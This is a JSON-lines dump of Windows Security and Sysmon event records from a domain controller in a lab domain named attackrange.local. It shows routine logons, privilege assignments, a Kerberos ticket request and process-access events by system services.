{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03EB-5F25-0000-00105B180B00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03EB-5F25-0000-00105B180B00}","TargetProcessId":"3396","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220686,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xB1B0C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xb1b0c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:56:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220687,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xB1B0C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54998\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xb1b0c","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54998","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:56:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220688,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xB1B0C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xb1b0c","LogonType":"3","EventReceivedTime":"2020-08-01 05:56:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:28.210\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:28.210","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:56:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220689,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E46D0AD1-12B9-6B2A-F109-80933E85570D}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E46D0AD1-12B9-6B2A-F109-80933E85570D}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:56:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220690,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xB2106\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xb2106","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:56:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220691,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xB2106\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{57450FE5-C44B-0141-9E0B-52CEEE20A081}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t55005\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xb2106","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{57450FE5-C44B-0141-9E0B-52CEEE20A081}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"55005","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:56:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:29.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 4548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:29.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"4548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:29.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 4548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:29.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"4548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
